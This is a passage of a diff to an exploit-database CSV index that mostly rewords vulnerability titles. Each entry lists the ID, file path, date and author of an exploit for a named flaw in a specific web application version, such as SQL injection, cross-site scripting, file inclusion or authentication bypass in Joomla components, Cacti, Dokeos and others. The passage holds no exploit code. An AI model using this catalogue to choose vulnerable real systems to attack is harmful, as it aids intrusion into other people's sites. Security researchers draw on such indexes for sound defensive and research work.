Scripting",2008-01-18,"H-T Team",php,webapps,0 31041,platforms/php/webapps/31041.txt,"BloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,AmnPardaz,php,webapps,0 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b - 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,asp,webapps,0 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router - Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps,0 -31044,platforms/php/webapps/31044.txt,"Singapore 0.10.1 Modern Template - 'gallery' Parameter Cross-Site Scripting",2008-01-21,trew,php,webapps,0 -31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Parameter Remote File Inclusion",2008-01-21,anonymous,php,webapps,0 -31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Parameter Multiple SQL Injections",2008-01-22,RawSecurity.org,php,webapps,0 +31044,platforms/php/webapps/31044.txt,"Singapore 0.10.1 Modern Template - 'gallery' Cross-Site Scripting",2008-01-21,trew,php,webapps,0 +31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Remote File Inclusion",2008-01-21,anonymous,php,webapps,0 +31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Multiple SQL Injections",2008-01-22,RawSecurity.org,php,webapps,0 31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 - 'attachments_header.php' Cross-Site Scripting",2008-01-22,NBBN,php,webapps,0 -31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0 +31055,platforms/asp/webapps/31055.txt,"Web Wiz (Multiple Products) - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 31061,platforms/php/webapps/31061.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting (1)",2008-01-25,"Omer Singer",php,webapps,0 @@ -32251,13 +32252,13 @@ id,file,description,date,author,platform,type,port 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0 31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0 31071,platforms/cgi/webapps/31071.txt,"VB Marketing - 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0 -31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 - 'add1' Parameter Cross-Site Scripting",2008-01-29,"Brendan M. Hickey",java,webapps,0 +31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 - 'add1' Cross-Site Scripting",2008-01-29,"Brendan M. Hickey",java,webapps,0 31074,platforms/php/webapps/31074.txt,"Nucleus CMS 3.22 - 'action.php' Cross-Site Scripting",2008-01-20,"Alexandr Polyakov",php,webapps,0 31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 - 'index.php' Cross-Site Scripting",2008-01-29,ShaFuck31,php,webapps,0 -31077,platforms/php/webapps/31077.txt,"Joomla! / Mambo Component com_buslicense - 'aid' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0 +31077,platforms/php/webapps/31077.txt,"Joomla! / Mambo Component com_buslicense - 'aid' SQL Injection",2008-01-30,S@BUN,php,webapps,0 31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting",2008-01-30,NBBN,php,webapps,0 31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri - 'index.php' SQL Injection",2008-01-30,ShaFuck31,php,webapps,0 -31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 - bgplg 'cmd' Parameter Cross-Site Scripting",2007-10-10,"Anton Karpov",cgi,webapps,0 +31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 - bgplg 'cmd' Cross-Site Scripting",2007-10-10,"Anton Karpov",cgi,webapps,0 31084,platforms/php/webapps/31084.txt,"Archimede Net 2000 - 'E-Guest_show.php' SQL Injection",2008-02-01,"Sw33t h4cK3r",php,webapps,0 31085,platforms/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,php,webapps,80 31086,platforms/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Persistent Cross-Site Scripting",2014-01-20,"Saeed reza Zamanian",php,webapps,80 @@ -32265,34 +32266,34 @@ id,file,description,date,author,platform,type,port 31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset",2014-01-20,KAI,hardware,webapps,80 31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 - 'catalog.php' Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 31092,platforms/php/webapps/31092.txt,"WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 -31093,platforms/php/webapps/31093.txt,"ITechClassifieds - viewcat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0 -31094,platforms/php/webapps/31094.txt,"ITechClassifieds - viewcat.php CatID Parameter Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 +31093,platforms/php/webapps/31093.txt,"ITechClassifieds - 'viewcat.php?CatID' SQL Injection",2008-02-02,Crackers_Child,php,webapps,0 +31094,platforms/php/webapps/31094.txt,"ITechClassifieds - 'viewcat.php?CatID' Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis NewsLetter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps,0 31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31101,platforms/php/webapps/31101.txt,"HispaH YouTube Clone - 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0 -31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk - operator/article/article_search_results.asp txtSearch Parameter Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 -31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk - operator/article/article_attachment.asp Attach_Id Parameter Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 +31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk - 'operator/article/article_search_results.asp?txtSearch' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 +31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk - 'operator/article/article_attachment.asp?Attach_Id' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 31107,platforms/php/webapps/31107.txt,"Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31108,platforms/php/webapps/31108.txt,"Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31109,platforms/php/webapps/31109.txt,"Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31110,platforms/php/webapps/31110.txt,"Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 -31111,platforms/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion - Multiple Local File Inclusion",2008-02-05,Psiczn,php,webapps,0 +31111,platforms/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion - Multiple Local File Inclusions",2008-02-05,Psiczn,php,webapps,0 31112,platforms/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps,0 -31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Parameter Cross-Site Scripting",2008-02-06,SkyOut,php,webapps,0 -31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 - 'search_term' Parameter Cross-Site Scripting",2008-02-06,Phanter-Root,php,webapps,0 +31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Cross-Site Scripting",2008-02-06,SkyOut,php,webapps,0 +31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 - 'search_term' Cross-Site Scripting",2008-02-06,Phanter-Root,php,webapps,0 31117,platforms/asp/webapps/31117.txt,"Ipswitch WS_FTP Server 6 - '/WSFTPSVR/FTPLogServer/LogViewer.asp' Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0 -31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-02-07,"Alexandr Polyakov",php,webapps,0 -31121,platforms/php/webapps/31121.txt,"Joomla! / Mambo Component com_sermon 0.2 - 'gid' Parameter SQL Injection",2008-02-07,S@BUN,php,webapps,0 -31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Parameter Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0 +31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-07,"Alexandr Polyakov",php,webapps,0 +31121,platforms/php/webapps/31121.txt,"Joomla! / Mambo Component com_sermon 0.2 - 'gid' SQL Injection",2008-02-07,S@BUN,php,webapps,0 +31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0 31125,platforms/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,php,webapps,0 -31126,platforms/php/webapps/31126.txt,"S9Y Serendipity Freetag-plugin 2.95 - 'style' Parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 +31126,platforms/php/webapps/31126.txt,"S9Y Serendipity Freetag-plugin 2.95 - 'style' Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps,0 31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - 'index.php' SQL Injection / Cross-Site Scripting",2008-02-09,Houssamix,php,webapps,0 31134,platforms/php/webapps/31134.txt,"VWar 1.5 - 'calendar.php' SQL Injection",2008-02-11,Pouya_Server,php,webapps,0 31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component - Multiple SQL Injections",2008-02-11,breaker_unit,php,webapps,0 -31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' Parameter SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0 +31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0 31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31141,platforms/php/webapps/31141.txt,"godontologico 5 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31142,platforms/php/webapps/31142.txt,"Simple E-document 1.31 - Login Bypass",2014-01-23,vinicius777,php,webapps,0 @@ -32302,185 +32303,185 @@ id,file,description,date,author,platform,type,port 31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - Reflected Cross-Site Scripting / Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0 31147,platforms/php/webapps/31147.txt,"Adult WebMaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0 31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0 -31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component com_iomezun - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0 -31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 -31157,platforms/php/webapps/31157.txt,"Cacti 0.8.7 - graph.php view_type Parameter Cross-Site Scripting",2008-02-12,aScii,php,webapps,0 -31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 - graph_view.php filter Parameter Cross-Site Scripting",2008-02-12,aScii,php,webapps,0 -31159,platforms/php/webapps/31159.txt,"Cacti 0.8.7 - 'tree.php' Multiple Parameter SQL Injections",2008-02-12,aScii,php,webapps,0 -31160,platforms/php/webapps/31160.txt,"Cacti 0.8.7 - graph_xport.php local_graph_id Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 -31161,platforms/php/webapps/31161.txt,"Cacti 0.8.7 - index.php/sql.php Login Action login_username Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 +31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component com_iomezun - 'id' SQL Injection",2008-02-12,S@BUN,php,webapps,0 +31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - 'graph_view.php?graph_list' SQL Injection",2008-02-12,aScii,php,webapps,0 +31157,platforms/php/webapps/31157.txt,"Cacti 0.8.7 - 'graph.php?view_type' Cross-Site Scripting",2008-02-12,aScii,php,webapps,0 +31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 - 'graph_view.php?filter' Cross-Site Scripting",2008-02-12,aScii,php,webapps,0 +31159,platforms/php/webapps/31159.txt,"Cacti 0.8.7 - 'tree.php' Multiple SQL Injections",2008-02-12,aScii,php,webapps,0 +31160,platforms/php/webapps/31160.txt,"Cacti 0.8.7 - 'graph_xport.php?local_graph_id' SQL Injection",2008-02-12,aScii,php,webapps,0 +31161,platforms/php/webapps/31161.txt,"Cacti 0.8.7 - 'index.php/sql.php?Login Action login_username' SQL Injection",2008-02-12,aScii,php,webapps,0 31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component - SQL Injection",2008-02-12,S@BUN,php,webapps,0 -31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0 +31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,php,webapps,0 31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0 -31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0 +31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0 40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80 31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0 -31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 +31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 31174,platforms/php/webapps/31174.txt,"Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80 -31175,platforms/php/webapps/31175.txt,"Joomla! Component JV Comment 3.0.2 - 'id' Parameter SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 +31175,platforms/php/webapps/31175.txt,"Joomla! Component JV Comment 3.0.2 - 'id' SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001 31183,platforms/php/webapps/31183.txt,"Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80 -31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component com_Joomlavvz - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0 -31273,platforms/php/webapps/31273.txt,"Joomla! / Mambo Component com_most - 'secid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 -31274,platforms/php/webapps/31274.txt,"Joomla! / Mambo Component com_asortyment - 'katid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 -31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 - spyce/examples/formtag.spy Multiple Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 +31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component com_Joomlavvz - 'id' SQL Injection",2008-02-20,S@BUN,php,webapps,0 +31273,platforms/php/webapps/31273.txt,"Joomla! / Mambo Component com_most - 'secid' SQL Injection",2008-02-21,S@BUN,php,webapps,0 +31274,platforms/php/webapps/31274.txt,"Joomla! / Mambo Component com_asortyment - 'katid' SQL Injection",2008-02-21,S@BUN,php,webapps,0 +31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 - 'spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps,0 31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0 -31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 - docs/examples/redirect.spy Multiple Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 +31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 - 'docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps,0 31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 - docs/examples/handlervalidate.spy x Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 - spyce/examples/request.spy name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 - spyce/examples/getpost.spy Name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 -31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' Parameter SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0 +31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0 31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections",2008-02-13,S@BUN,asp,webapps,0 -31192,platforms/php/webapps/31192.txt,"Joomla! / Mambo Component com_model - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0 -31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component com_omnirealestate - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0 -31194,platforms/php/webapps/31194.txt,"Dokeos 1.8.4 - whoisonline.php id Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31192,platforms/php/webapps/31192.txt,"Joomla! / Mambo Component com_model - 'objid' SQL Injection",2008-02-13,S@BUN,php,webapps,0 +31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component com_omnirealestate - 'objid' SQL Injection",2008-02-13,S@BUN,php,webapps,0 +31194,platforms/php/webapps/31194.txt,"Dokeos 1.8.4 - 'whoisonline.php?id' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 31195,platforms/php/webapps/31195.txt,"Dokeos 1.8.4 - main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31196,platforms/php/webapps/31196.txt,"Dokeos 1.8.4 - main/calendar/myagenda.php courseCode Parameter Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31197,platforms/php/webapps/31197.txt,"Dokeos 1.8.4 - main/admin/course_category.php category Parameter Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31198,platforms/php/webapps/31198.txt,"Dokeos 1.8.4 - main/admin/session_list.php cmessage Parameter Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31199,platforms/php/webapps/31199.txt,"Dokeos 1.8.4 - main/mySpace/index.php tracking_list_coaches_column Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31200,platforms/php/webapps/31200.txt,"Dokeos 1.8.4 - main/create_course/add_course.php tutor_name Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog - Multiple Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 +31196,platforms/php/webapps/31196.txt,"Dokeos 1.8.4 - 'main/calendar/myagenda.php?courseCode' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31197,platforms/php/webapps/31197.txt,"Dokeos 1.8.4 - 'main/admin/course_category.php?category' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31198,platforms/php/webapps/31198.txt,"Dokeos 1.8.4 - 'main/admin/session_list.php?cmessage' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31199,platforms/php/webapps/31199.txt,"Dokeos 1.8.4 - 'main/mySpace/index.php?tracking_list_coaches_column' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31200,platforms/php/webapps/31200.txt,"Dokeos 1.8.4 - 'main/create_course/add_course.php?tutor_name' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog - Multiple Local File Inclusions",2008-02-14,muuratsalo,php,webapps,0 31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 -31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component com_activities - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component com_activities - 'id' SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' SQL Injection",2008-02-15,S@BUN,php,webapps,0 31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component com_lexikon - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 -31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 -31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component com_lexikon - 'id' SQL Injection",2008-02-16,S@BUN,php,webapps,0 +31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component Filebase - 'filecatid' SQL Injection",2008-02-16,S@BUN,php,webapps,0 +31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' SQL Injection",2008-02-15,S@BUN,php,webapps,0 31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0 32241,platforms/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0 32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,php,webapps,0 32243,platforms/php/webapps/32243.txt,"Nukeviet 2.0 - 'admin/login.php' Cookie Authentication Bypass",2008-08-13,Ciph3r,php,webapps,0 32244,platforms/php/webapps/32244.txt,"YapBB 1.2 - 'class_yapbbcooker.php' Remote File Inclusion",2008-08-13,CraCkEr,php,webapps,0 -32245,platforms/php/webapps/32245.txt,"Nortel Networks SRG V16 - modules.php module Parameter Cross-Site Scripting",2008-08-13,CraCkEr,php,webapps,0 -32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 -32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 +32245,platforms/php/webapps/32245.txt,"Nortel Networks SRG V16 - 'modules.php?module' Cross-Site Scripting",2008-08-13,CraCkEr,php,webapps,0 +32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - 'admin_modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 +32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - 'modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0 -31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0 -31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 +31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 -31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 +31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 31230,platforms/php/webapps/31230.txt,"WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 -31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc camnum' Parameter Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 -31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic id' Parameter Arbitrary Memory Disclosure",2008-02-18,"Luigi 